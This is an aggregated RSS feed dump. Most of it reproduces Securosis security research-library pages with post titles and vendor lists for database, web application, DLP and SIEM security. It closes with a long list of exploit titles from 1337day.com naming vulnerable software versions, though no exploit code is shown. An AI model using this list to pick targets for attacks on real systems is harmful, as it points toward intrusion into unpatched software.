Dataguise Inc. Exhibitor 645 Database Security Data Security http://www.dataguise.com/
Department of Homeland Security/ US-CERT Exhibitor 457 http://www.us-cert.gov/
DeviceLock Exhibitor 2228 Mobile Security

==> Welcome to Securosis Research

http://securosis.com/feeds/research

About Our Research

Securosis is a new breed of IT research firm focusing on the broad information security and compliance markets. Instead of relying on big sales forces and high paywalls, we publish our primary research for free on our blog. Yeah, we know, it’s different and scary. But it works.

In terms of our primary research model, our focus is to help mid-market IT and security professionals successfully execute on their projects, by providing actionable information to accelerate their progress. That doesn’t mean our research isn’t relevant to large enterprises and government agencies. It just means our primary constituency is someone who wears a security hat as well as a number of other hats on a daily basis.

Each week, Securosis publishes a ton of research on what’s happening in the security business, all focused on keeping our readers connected and focused on what’s important, not on the noise. Our weekly research includes:

* Securosis FireStarter: Periodically Securosis holds an internal, no-holds-barred research meeting. Each analyst prepares a topic and the other analysts typically rip it to shreds. The end result is a thought generator that challenges our perspectives and demands further discussion. We publish the findings of that research to “stir the pot” a bit and get the echo chamber vibrating.
* Securosis Incite: Something we’ve adopted from Security Incite is a hard-hitting summary of the news happening in our industry. Each Wednesday we send out 7-8 links with analysis of what’s happening out there and why it’s important.
* Securosis Weekly Summary: Just in case you don’t have anything better to do over the weekend, on Friday we send out a list of things we’ve posted on the blog and also each analyst’s favorite outside post. This keeps you up to date on what we’ve been up to.
* Ad Hoc Posts: Yes, the art of blogging is far from dead. During the week, once or twice a day we post something of interest. It could be a more detailed treatment of an announcement, something that’s been bothering us, or part of our primary research (which is always posted to the blog first).

In case you are some kind of dinosaur and don’t use an RSS reader, you can sign up for email distribution of our blog posts. Sign up for the Daily Digest or the Weekly Summary.

For each of our coverage areas, we have a defined hierarchy of primary research documents we prepare to ensure deep coverage and actionable advice:

* Understanding and Selecting: This series of posts provides the backdrop for each security domain. The research takes a product category perspective and helps readers understand why and how they’d use certain technology, and what is important when evaluating products and offerings. As an example, check out our work on Understanding and Selecting a Database Activity Monitoring Solution.
* Building a [Topic] Program: The next level in our research is how to structure a security program to solve a specific problem. This goes beyond figuring out which product to buy, to the underlying processes and techniques required to address a specific problem. See our Building a Web Application Security Program for an example of this research.
* Project Quant: For a select few coverage areas, we go very deep and define very granular process maps, then establish metrics to quantify those processes for an aspect of security. We run a public survey to make sure we nail the process map, and publish the survey results when we get a statistically significant sample. Check out Project Quant for Patch Management to understand this research.
About the Research Library
Are you tired of having to hunt through screen after screen of crappy search results just to find the few bits of information you need? Or trawl through endless forums and unrelated blog entries just to educate yourself on a new topic? We are too… that’s why we created the Securosis Research Library.

The Library is designed to be your first stop when researching a new topic. We’ve collected our best blog posts, white papers, and multimedia materials together in a structure designed to help you find what you need as quickly as possible. Unlike search results or a wiki, we’ve organized the material for each topic in the order we think it will be most useful, rather than by date or some other arbitrary sorting method. We don’t cover every security topic you could think of, but we’re constantly expanding into new areas and filling in coverage that’s lighter than we’d like.

Where possible, for technology-related topics we include a list of Free/Open Source and commercial products. We try to keep these lists updated, but if you see something we are missing please email us so we can add it. This is just a list of what’s available in alphabetical order – we aren’t endorsing any particular products.

We update the material in the Library on an ongoing basis, and each entry is dated with the last update. If you’d like to keep your own copy, just subscribe to the RSS feed. Since we update the date on each entry when we make changes, your RSS reader should keep a current, local copy of the entire library. Pretty cool, eh? We hope you find it useful, and please email us with any suggestions, errors, or omissions.

==> Endpoint Security

http://securosis.com/feeds/research Stand by for our endpoint security page.

==> Security Management

http://securosis.com/feeds/research Stand by for our security management page.

==> Network Security

http://securosis.com/feeds/research Stand by for our network security page.

==> Cloud and Virtualization

http://securosis.com/feeds/research This is one of the newest areas of our coverage, and although cloud computing and virtualization are distinct technologies, they are very closely related.

==> Compliance

http://securosis.com/feeds/research

Papers and Posts

This section covers compliance topics and several general security issues related to compliance with industry and governmental regulations. This is a new section for us, and while we have a ton of information on this topic, we will be evolving how we present the material over time. These articles are strategic in nature, but we will be adding videos and podcasts for hands-on guidance in the coming weeks.

General Coverage

1. It Isn’t Risk Management If You Can’t Lose
2. Visa’s Data Field Encryption
3. Tokenization Will Become the Dominant Payment Transaction Architecture
4. Some Follow-Up Questions for Bob Russo, General Manager of the PCI Council
5. We Know How Breaches Happen
6. New Details, and Lessons, on Heartland Breach
7. Heartland Hackers Caught; Answers and Questions
8. An Open Letter to Robert Carr, CEO of Heartland Payment Systems

Presentations

* Presentation on Tokenization Guidance for PCI.
* Presentation on Data Breaches and Encryption.
* Presentation on Data Protection in the Enterprise. This is a corporate overview.
* Presentation on Encrypting Mobile Data for the Enterprise.

Podcasts, Webcasts and Multimedia

We do not currently have any multimedia for this topic. Please email info@securosis.com if you have any additions or corrections.

==> Database Security

http://securosis.com/feeds/research Database Security is one of the broader topics that Securosis covers. Database servers are highly complex systems – storing, organizing, and managing data for a wide array of applications. Most mid-sized firms have dozens of them, some embedded in desktop applications, while others serve core systems such as web commerce, financials, manufacturing, and inventory management. A Fortune 100 company may have thousands.

To address the wide range of offerings and uses, we cover database security from two different angles. The first is the security of the database application itself, and the second is the use and security of the data within the database. Database Vulnerability Assessment (VA), access control and user management, and patch management are all areas where preventative security measures can be applied to a database system. For securing the data itself, we include such topics as Database Activity Monitoring (DAM), auditing, data obfuscation/masking, and database encryption. Technologies like database auditing can be used for either, but we include them in the latter category because they provide a transactional view of database usage. We also include some of the database programming guidelines that can help protect databases from SQL injection and other attacks against application logic.

Papers and Posts

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, along with the comments.)

1. Understanding and Selecting a Database Security Platform is our new comprehensive database security paper.
2. Our Database Activity Monitoring research paper remains a reader favorite and can be downloaded here: “Understanding and Selecting a Database Activity Monitoring Solution” white paper.
3. Understanding and Selecting a Database Assessment Solution is now available. We are very happy with this paper. We have even been told by database assessment vendors that their product teams learned some tips from it, and we think you will too.
4. Our Understanding and Selecting a Database Encryption or Tokenization Solution paper is available.
5. Database Audit Events is a comprehensive list of database events available through native database auditing techniques.
6. Many supporting posts on Database Encryption: Application vs. Database Encryption, Database Encryption: Fact vs. Fiction, Format and Datatype Preserving Encryption, An Introduction to Database Encryption, Database Encryption Misconceptions, Media encryption options for databases, and threat vectors to consider when encrypting data.
7. The 5 laws of Data Masking.

Database Security Patch Coverage

1. Oracle Critical Patch Update, July 2009.

General Coverage

1. SQL Injection Prevention
2. Database Audit Performance in this Friday Summary introduction
3. Database Encryption Benchmarking
4. Three Database Roles: Programmer, DBA, Architect
5. Database Security: The Other First Steps
6. Sentrigo and MS SQL Server Vulnerability.
7. Amazon’s SimpleDB.
8. Information on Weak Database Password Checkers.
9. Database Connections and Trust (databases are not typically set up to validate incoming connections against SQL injection and misused credentials), and this post recommending Stored Procedures to address SQL Injection attacks.
10. Separation of Duties and Functions through roles and programmatic elements, and putting some of the web application code back into the database.
11. Native database primary key generation to avoid data leakage and inference problems, and additional comments on Inference Attacks.
12. Your Top 5 Database Security Resolutions.
13. Posts on separation of duties: Who “Owns” Database Security, and the follow-up: DBAs should NOT own DAM & Database Security.
14. A look at general threats around using External Database Procedures and variants in relational databases.
15. Database Audit Events.
16. Database Security Mass-Market Update and Friday Summary - May 29, 2009
17. Database Patches, Ad Nauseum
18. Acquisitions and Strategy
19. Comments on Oracle’s Acquisition of Sun
20. Oracle CPU for April 2009
21. Netezza buys Tizor
22. More Configuration and Assessment Options. Discusses recent Oracle and Tenable advancements.
23. Policies and Security Products applies to database security as well as other product lines.
24. Oracle Security Update for January 2009.
25. Responding to the SQL Server Zero Day: Security Advisory 961040 includes some recommendations and workarounds.
26. Will Database Security Vendors Disappear? and Rich’s follow-on Database Security Market Challenges considerations for this market segment.
27. Behavioral Monitoring for database security.
28. NitroSecurity acquired RippleTech.
29. Database Monitoring is as big or bigger than DLP.

Presentations

* Rich’s presentation on Understanding and Selecting a Database Activity Monitoring Solution. (PDF)
* Oracle Database Security in a Down Economy. (PDF)

Podcasts, Webcasts and Multimedia

None at this time.

Vendors/Tools

The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections.

Database Security Platforms
* Application Security Inc. (DBProtect)
* Fortinet
* GreenSQL
* IBM (Guardium)
* Imperva (SecureSphere)
* McAfee (Sentrigo, Nitro)
* Oracle (Secerno)

Database Vulnerability Assessment
* Application Security Inc. (AppDetective, DBProtect)
* Fortinet (IPLocks)
* IBM (Guardium)
* Imperva (DAS, Scuba)
* McAfee (Sentrigo)
* Oracle (mValent, Config. Packs)
* Qualys
* Tenable Network Security (Nessus)
* Next Generation Security Software NGS (Squirrel)

Database Encryption
* NetLib
* Oracle (TDE, API)
* Protegrity
* Prime Factors
* Relational Wizards
* RSA (Valyd)
* SafeNet (Ingrian)
* Sybase
* Thales (aka nCipher)
* Trustwave (Vericept)
* Voltage

Note that some of the vendors listed provide transparent disk encryption or application layer encryption that can be applied to database files or content.

Database Auditing
* GreenSQL
* Oracle (Audit Vault)
* SoftTree Technologies (DB Audit Expert)
* Quest (InTrust for DB)

Note that all DAM vendors provide auditing to one degree or another. This section designates specific products that provide database auditing, are not part of a DAM solution, and are not built into a database platform as a standard component.

Database Masking
* Axis Technology
* Camouflage
* dataguise
* Embarcadero
* Grid-Tools
* GreenSQL
* Hexaware/Akiva
* IBM (Optim/Princeton Softech)
* Informatica (ETL + Applimation)
* MENTiS Software
* Voltage (ETL + Dynamic)

Note that several vendors offer format preserving encryption and tokenization, such as NuBridges, Prime Factors, Protegrity and Voltage, which also provide some masking capabilities.

Database Vendors
* IBM
* Oracle (Oracle, MySQL)
* Sybase
* Teradata
* Apache (Derby)
* PostgreSQL (Postgres)
* Ingres (Open Ingres)

There are dozens of vendors, both big and small, who offer databases – many with specific competitive advantages. We aren’t even attempting to be comprehensive, and have specifically ignored any without widespread mainstream adoption. There are also dozens more open source databases with small numbers of deployments, perhaps primarily embedded in applications or backending non-commercial web applications.

==> Web Application Security

http://securosis.com/feeds/research Here we focus on security specifically for web applications, as opposed to traditional corporate or enterprise applications. Our research pages on general application security should be used in tandem with this one, but this section focuses on the unique issues of web application security.

By our definition, Web Application Security is a superset of traditional application security. Why? Because more often than not, web applications are backed by enterprise applications. They have all of the same problems, along with a handful of new security issues that are specific to offering distributed programs and functions across the Internet. For example, web applications offer features and functions to users outside the corporate network, so they cannot make any assumptions about the security of the network transmission or the intentions of the user. They run on top of a complex conglomeration of services, consist primarily of custom code, produce dynamic content, and provide their UI entirely through a browser.

Papers and Posts

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)

1. The most important piece of work we’ve published on Web Application Security is Building a Web Application Security Program. For those of you who followed along with the blog series, this is a compilation of that content, but it has been updated to reflect all the comments we received, with additional research, and the entire report was professionally edited. The original blog series can be found here (Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7, and Part 8), as well as a couple of points we forgot to mention.
2. Rich’s post on How the Cloud Destroys Everything that I Love (About Web App Security).
3. The Risks of Trusting Content.
4. Web Application Security: We Need Web Application Firewalls to Work. Better.

General Coverage

1. XML Security Overview
2. It’s Thursday the 13th—Update Adobe Flash Day
3. Heartland Hackers Caught; Answers and Questions
4. Using a Mac? Turn Off Java in Your Browser. We’re All Gonna Get Hacked is about the browser, not the app, but we’ll cross-reference it here.
5. There Are No Trusted Sites: Security Edition
6. Click-jacking Details, Analysis, and Advice.
7. Comments on “Containing Conficker”, a brief analysis of the Honeynet Project’s Know Your Enemy paper, which examines how the Conficker worm attacks and behaves in general.
8. WAF vs. Secure Code vs. Dead Fish.
9. Adrian’s comments on structured software development security programs and the problems of moving from Waterfall to Agile Software Development.

Presentations

* Our presentation on Building A Web Application Security Program. This was presented as supplementary material to the white paper of the same name.
* Presentation on Integrating Penetration Testing Into a Web Application Vulnerability Assessment Program. (PDF)

Podcasts, Webcasts and Multimedia

We do not currently have any multimedia for this topic.

Vendors/Tools

The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Remember that web application security is over and above the standard application security practices and technology, and these should be considered alongside other tools. We strongly encourage you to learn about the specifics of the subcategories in the navigation menu.

Web Application Assessment
* Cenzic
* HP
* Secure Works
* WhiteHat Security

Penetration Testing
* AppLabs
* Bonsai
* CGISecurity
* Core Security Technologies
* McAfee (Foundstone)
* Plynt
* Rvasi
* WindowSecurity.com

Static Source Code Review
* Aspect Security
* Cigital
* Fortify
* IBM
* Ounce
* Veracode

Dynamic Source Code Review
* Coverity
* Ounce
* Veracode

Web Application Firewalls
* armorlogic
* ArtofDefense Hyperguard
* Barracuda Networks
* Breach
* Cisco
* F5
* Fortify
* Fortinet
* Imperva
* Protegrity

Monitoring
All WAF vendors can monitor as well.

Education & Training
* SANS Institute
* SAIC

Most regional ISSA and ISACA chapters can provide assistance as well.

==> Web, Email, and Data Portal Security

http://securosis.com/feeds/research This research page covers web filtering as well as email security and anti-spam options. The email security market, like the web gateway market, is one of the most saturated and commoditized in the security industry. As with firewalls and anti-virus (on Windows), it is essentially impossible to do business without these tools. And to no one’s surprise we see continued convergence of these threat protection products; in some cases it’s merely mergers and acquisitions to provide two separate products from the same vendor, but in other cases we see combined solutions – often in an attempt to displace point products. As many of the site-managed solutions also offer gateway and secure data exchange services, we will cover those here as well.

The intended audience for this page is those interested in security products for their business, to keep their users’ inboxes free of spam and ensure Internet browsing stays within company policy. In the past we would just have said ‘bleep’, as that is why many of these platforms are purchased. In reality there are many other security and compliance uses for these technologies, which are at least as important.

Papers and Posts

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)

1. Barracuda Networks Acquires Purewire
2. McAfee Acquires MX Logic
3. The Symantec acquisition of MessageLabs demonstrates that the battle for this fully commoditized market is not over.
4. Marshal8e6 Buys Avinti, and how the smaller vendors need to innovate and re-position their technologies to compete.

General Coverage

1. The First Phishing Email I Almost Fell For
2. I Heart Creative Spam
3. Spam Levels and Anti-Spam SaaS.
4. Hackers 1, Marketing 0.

Presentations

PDF versions of presentations (when available) may also be useful, although they don’t include any audio (for any audio/video, please see the next section).

Podcasts, Webcasts and Multimedia

We do not currently have any multimedia for this topic.

Vendors/Tools

The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email us if you have any additions or corrections.

Vendors
* Aladdin
* Astaro
* Axway (Tumbleweed)
* Barracuda Networks
* Cisco (Ironport)
* Clearswift (MIMESweeper)
* Cloudmark
* CommTouch
* Google (Postini)
* Marshal8e6 (Mail Marshal + 8e6 Technologies)
* McAfee (IronMail, WebWasher, Secure Computing, CipherTrust)
* Proofpoint
* SonicWall (MailFrontier)
* Symantec (BrightMail and MessageLabs)
* WebSense

==> Research: Data Loss Prevention

http://securosis.com/feeds/research We’ve probably written more about Data Loss Prevention than about any other single technology. Actually, we prefer to call it Content Monitoring and Protection (CMP), but when we use that term only about 3 people know what we’re talking about. We define CMP/DLP as: Products that, based on central policies, identify, monitor, and protect data at rest, in motion, and in use through deep content analysis.

We use a pretty narrow definition to keep things clear – CMP/DLP is a defined product category, not a general term for anything that protects data. Encryption, DRM, portable device control, and all the other things that call themselves DLP can help with data loss, but aren’t DLP. We think using a big bucket like that only confuses people. The best way to tell if something is DLP is to focus on the content awareness/analysis. If it only uses keywords or basic regular expressions, it isn’t really DLP.

Now why should you care about DLP? Is it just another over-hyped technology? Nope – we consider it one of the most significant security technologies to emerge over the past few years. By adding content and context awareness, we can now protect information based on what it is, as opposed to where it’s stored or some silly label someone slapped on it as metadata. CMP tools are also expanding their understanding of business context, not just the data itself, so we can apply intelligent policies that reflect business processes, while only interfering with those processes when there is a policy violation. CMP helps us find our sensitive information, watch how it’s being used, and then protect it. It’s far from perfect, but it’s still good enough that we recommend it, and we’d use it ourselves if we didn’t just give away all of our stuff for free.

We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it was added to help you find changes more easily.

Papers and Posts

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all of the public comments as well.)

1. The most important piece of work we’ve published on CMP/DLP is our white paper, Understanding and Selecting a Data Loss Prevention Solution (/research/publication/report-data-loss-prevention-whitepaper/). This report covers all the basics: features, architectures, use cases, and a recommended selection process with testing criteria. It was originally released as a series of blog posts: part 1 (introduction), part 2 (content awareness), part 3 (data-in-motion), part 4 (data-at-rest), part 5 (data-in-use/endpoint), part 6 (central administration), and part 7 (selection process). This is really the place to start if you need to learn about DLP.
2. I also wrote a feature for Information Security Magazine that covers similar material, but is much more condensed.
3. We also released a paper on Best Practices for DLP Content Discovery. This covers all the important issues when using DLP for data at rest. It was also a six-part series: part 1, part 2, part 3, part 4, part 5, part 6 (use cases).
4. The third paper in our CMP/DLP series is dedicated to Best Practices for Endpoint DLP. As always, available as a series of blog posts: part 1, part 2, part 3, part 4, part 5, part 6 (use cases).
5. An early article on DLP as a feature vs. a full solution: DLP Is A Feature, CMF (Or Whatever We’ll Call It) Is A Solution.
6. A discussion on the evolution of CMP: DLP/ILP/Extrusion Prevention < CMF < CMP < SILM: A Short Evolution of Data Loss Prevention.
7. A short piece I did for Network World on DLP, and why it’s worth looking at now.
8. I’m a big proponent of full DLP solutions; this explains why: Data Protection Isn’t A Network Security Or Endpoint Problem.
9. The dirty little secret of DLP.
10. Data protection developments are running along parallel paths – one for productivity applications and communications (CMP/DLP), and the other in the data center (ADMP). Our definitions of DLP and ADMP.
11. Then a post on how those two worlds will connect.
12. A Network World article I wrote on pitfalls of DLP.
13. A look at the differences between DLP, content classification, and e-discovery.
14. You can also use DLP to help prevent malicious outbound connections from sophisticated attackers.
15. In Quick Wins with Data Loss Prevention we cut through the complexity and provide a process for getting immediate value out of your DLP investment, while still setting yourself up for the long term.

Presentations

* Presentation on Understanding and Selecting a Data Loss Prevention System. This is a companion to the DLP White Paper.

Podcasts, Webcasts and Multimedia

We do not currently have any multimedia for this topic.

Vendors/Tools

The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Note that many other products include “DLP light” features, such as basic keyword or regex matching. We are only including dedicated DLP solutions here.

Full Suite DLP
* CA (Orchestria)
* Code Green Networks
* EMC/RSA (Tablus)
* GTB Technologies
* McAfee (Reconnex)
* Symantec (Vontu)
* Vericept
* Websense (PortAuthority)
* Workshare

Network-only tools
* Clearswift
* Fidelis Security Systems
* Palisade Systems
* Proofpoint

Endpoint-only tools
* NextSentry
* Trend Micro (Provilla)
* Verdasys

==> Application Security

http://securosis.com/feeds/research This section of the research library is dedicated to application security in its many forms. On this page we cover the basic topics, such as Access Control, Monitoring & IDS, SIM, SEM, and Log Management. For other specialized fields within application security, such as web application security and secure software development practices, we provide dedicated subsections. On the navigation bar you will see that we already have a few pages for specific coverage areas. We will continue to fill out our application security offerings, and provide additional specific coverage areas over time. Feel free to make a request if you have something in this area you are interested in seeing.

Papers and Posts

* Adrian’s comments on structured software development security programs and the problems of moving from Waterfall to Agile Software Development.
* How Common Applications Are (Now) the Weakest Link.
* Comments on “Containing Conficker” considers some of the challenges most application developers are up against.
* Immutable Log technologies help with auditing and event trail verification.
* For application security, the implementation and management of a policy set is a key factor in the cost and effectiveness of just about any security product (and, frankly, your happiness as well).
* Separation of Duties, Concept of Least Privilege, and other role-based user security measures.
* The Perils of the Insider Threat.
* PDF Security Pain, and things to think about for all script-enabled applications.
* A very cool way of reverse engineering applications and content with Visual Forensic Analysis tools.

Presentations

* Security + Agile = FAIL. Live presentation is here.
* This presentation covers Major Enterprise Application Security.

Podcasts, Webcasts and Multimedia
Subscribe to our daily email digest

==> SIM, SIEM, and Log Management

http://securosis.com/feeds/research This research page covers System Information Management (SIM), System Event Management (SEM), and Log Management technologies. Basically anything that collects events from application and host system log files, or provides analysis and reporting on those events. There will be a few other variants in the type of data collected, where it is collected from, and the speed and depth of analysis performed. As these three areas are morphing into one, we felt it would be best at this time to stop pretending they are “differentiated” things and talk about the common business problems they help customers address.

Papers and Posts
------------
If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)
1. SIEM, Today and Tomorrow is a look back at some of the evolutionary struggles of SIM/SEM, and what is happening with the market space today.
2. LogLogic Acquires Exaprotect.
3. It seems like every other post we mention SIM/SEM and Log Management. We get a briefing from a vendor nearly every week, and we both know and cover this space. Creating this research page, we realized just how few posts we have written that are dedicated to it. We will provide more in the coming weeks.

General Coverage
------------
1. Policies and Security Products, covering the expense of policy creation and maintenance.

Presentations
---------
1. Adrian’s presentation on Meeting Compliance with SIM, SEM and Log Management provides an in-depth discussion of using SIM/SEM and Log Management products for meeting compliance, and offers practical tips in dealing with technical and process challenges.

Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic.

Vendors/Tools
---------
The following is just an alphabetized and categorized list of vendors and products we are aware of in this area (including free tools). It does not imply endorsement, and is meant to assist you, should you start looking for tools. Please email info@securosis.com if you have any additions or corrections.

Vendors
* ArcSight
* CA
* CISCO MARS
* eIQ
* ExaProtect
* IBM
* Intellitactics
* LogLogic
* LogRhythm
* NetForensics
* NetIQ
* NitroSecurity
* Quest InTrust
* RSA EnVision
* Sensage
* Symantec SSIM
* Tenable
* TriGeo
* Q1 Labs

==> Project Quant

http://securosis.com/feeds/research Project Quant is a special research project to develop a metrics model for measuring the costs and effectiveness of patch management. This page includes the research deliverables associated with the project. All of the draft materials and public feedback are available on the project Blog and Forums:
* The Project Quant Blog and Landing Page
* The Project Quant Forums

Published project documents include:
* Version 1.0 of the Project Quant Report
* The Project Quant Survey Results Analysis

Here are the raw survey results from the project’s Open Patch Management Survey:
* Project Quant Raw Survey Results, September 2009. (Zip file includes summary results in Excel format, and full raw results in Excel and CSV formats.)
* The survey is still active, and you can participate here.

==> ADMP: Application and Database Monitoring and Protection

http://securosis.com/feeds/research Applications and Database Monitoring and Protection: ADMP. What is it? It’s a different way to think about security for applications. It’s a unified approach to securing applications by examining all of the components at once, viewing security as an operational issue, and getting tools to talk to each other. It means looking at application security in context of the business rules around transaction processing, and not just from a generic network traffic perspective. It is also a bit of prognostication, recommendation, and evangelism on our part, all rolled up into one unified theory. This approach also defocuses from some of the more traditional network and platform security models, and looks at the data and how applications process transactions and data. ADMP is essentially the data center branch of information-centric security, and it combines elements of data and application security into a consistent and specific architecture. The goal is to watch application transactions from the browser through the database, and apply security controls that actually ‘understand’ what’s going on. Our definition is: Products that monitor all activity in a business application and database, identify and audit users and content, and, based on central policies, protect data based on content, context, and/or activity.

Papers and Posts
------------
1. The lead-in to this series of thought is Rich’s posts on The Future Of Application and Database Security, Part 1 and Part 2.
2. Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection.
3. What is my motivation, or Why Are We Talking About ADMP.
4. ADMP and Assessment: Linking preventative and detective technologies.
5. ADMP: A Policy Driven Example.
6. Web Application Security: We Need Web Application Firewalls to Work. Better.
7. It’s Time To Move Past Vulnerability Scanning To Anti-Exploitation.

Presentations
---------
* Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle.

Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic.

==> web - vShare<=2.8.1 SQL injection + Remote Command Execution

http://www.1337day.com/rss

==> dos / - Kaspersky Internet Security 2013 - Denial Of Service Vulnerability

http://www.1337day.com/rss

==> web - Nconf 1.3 SQL Injection / Cross Site Scripting Vulnerabilities

http://www.1337day.com/rss

==> local - Setuid Tunnelblick Privilege Escalation Vulnerability

http://www.1337day.com/rss

==> local - Viscosity setuid-set ViscosityHelper Privilege Escalation Vulnerability

http://www.1337day.com/rss

==> web - phpMyRecipes 1.2.2 XSS / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - Demandware Store XSS Vulnerability

http://www.1337day.com/rss

==> web - PloggerGallery 1.0 RC1 CSRF / XSS / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - D-Link DSL-2740B Authentication Bypass Vulnerability

http://www.1337day.com/rss

==> web - Question2Answer 1.5.3 CSRF / Brute Force Vulnerability

http://www.1337day.com/rss

==> dos / - Hanso Player 2.1.0 (.m3u) - Buffer Overflow Vulnerability

http://www.1337day.com/rss

==> web - Doorgets CSRF Vulnerability

http://www.1337day.com/rss

==> web - Piwigo 2.4.6 - Multiple Vulnerabilities

http://www.1337day.com/rss

==> remote - Sami FTP Server 2.0.1 LIST Command Buffer Overflow

http://www.1337day.com/rss

==> web - PHP-Fusion 7.02.05 XSS / LFI / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - D-Link DIR-645 Authentication Bypass Vulnerability

http://www.1337day.com/rss

==> web - Piwigo 2.4.6 Cross Site Request Forgery / Traversal Vulnerabilities

http://www.1337day.com/rss

==> web - Geeklog 1.8.2 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - Scripts Genie Top Sites v2.11 <= Remote XSS Vulnerability

http://www.1337day.com/rss

==> web - Gallery Personals Script Remote XSS Vulnerability

http://www.1337day.com/rss

==> web - Scripts Genie Domain Trader Remote XSS Vulnerability

http://www.1337day.com/rss

==> web - Digitale Age scripte Remote XSS/FPD Vulnerabilities

http://www.1337day.com/rss

==> web - Hitechvalley iNet CMS advanced SQL Injection vulnerability

http://www.1337day.com/rss

==> remote - Fileutils Ruby Gem Remote Command Execution Vulnerability

http://www.1337day.com/rss

==> web - 360wichita XSS/SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - KeenLook XSS/SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - Epop Studio XSS/SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - Blog System 2.0 XSS/SQL Injection Vulnerability

http://www.1337day.com/rss

==> local - Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root

http://www.1337day.com/rss

==> local - uTorrent 3.x app exploit 0day

http://www.1337day.com/rss

==> web - Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability

http://www.1337day.com/rss

==> web - Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Brewthology 0.1 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - MTP Image Gallery 1.0 XSS Vulnerability

http://www.1337day.com/rss

==> web - MTP Guestbook 1.0 - Multiple XSS Vulnerabilities

http://www.1337day.com/rss

==> web - MTP Poll 1.0 - Multiple XSS Vulnerabilities

http://www.1337day.com/rss

==> web - Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> web - Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> web - PolarPearCms PHP File Upload Vulnerability

http://www.1337day.com/rss

==> web - MindStorm CMS SQL Injection vulnerability

http://www.1337day.com/rss

==> web - WEBalbum 2.0 SQL Injection Vulnerability

http://www.1337day.com/rss

==> dos / - Joomla <=2.5.8,<=3.0.2 remote tcp connections opener

http://www.1337day.com/rss

==> web - Google Alert And Twitter WP Plugin v. 3.1.5 XSS Exploit & SQL Injection

http://www.1337day.com/rss

==> remote - Java Applet JMX Remote Code Execution

http://www.1337day.com/rss

==> web - Flatstick CMS PHP Hash Collision Denial Of Service Vulnerability

http://www.1337day.com/rss

==> local - TeamViewer V8.0.16642 Insecure Library Load

http://www.1337day.com/rss

==> web - Rix4Web Portal Remote Blind SQL Injection Vulnerability

http://www.1337day.com/rss

==> local - Photodex ProShow Producer 5.0.3297 Insecure Library Load

http://www.1337day.com/rss

==> web - TECNOMEGA SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - EasyWebScripts eBay Clone Script SQL Injection / XSS Vulnerabilities

http://www.1337day.com/rss

==> web - ArrowChat 1.5.61 RFI Vulnerability

http://www.1337day.com/rss

==> web - EAFlash Uploader Remote File Upload vulnerability

http://www.1337day.com/rss

==> web - Web Cookbook File Disclosure / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - OpenEMR 4.1.1 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - Alt-N MDaemon 13.0.3 and 12.5.6 Email Body HTML/JS Injection Vulnerability

http://www.1337day.com/rss

==> web - Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - glFusion 1.2.2 - Multiple XSS Vulnerabilities

http://www.1337day.com/rss

==> web - phpMyRecipes 1.2.2 - SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - phpMyRecipes 1.2.2 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - RTTucson Quotations Database Authentication Bypass Vulnerability

http://www.1337day.com/rss

==> web - glFusion 1.2.2 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - e107 Persistent XSS vulnerability

http://www.1337day.com/rss

==> remote - BigAnt Server 2 SCH And DUPF Buffer Overflow Vulnerability

http://www.1337day.com/rss

==> remote - BigAnt Server DUPF Command Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> web - Foswiki MAKETEXT 1.1.7 / 1.0.10 Code Execution Vulnerability

http://www.1337day.com/rss

==> web - OpenEMR PHP File Upload Vulnerability

http://www.1337day.com/rss

==> web - Squirrelcart 3.5.4 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

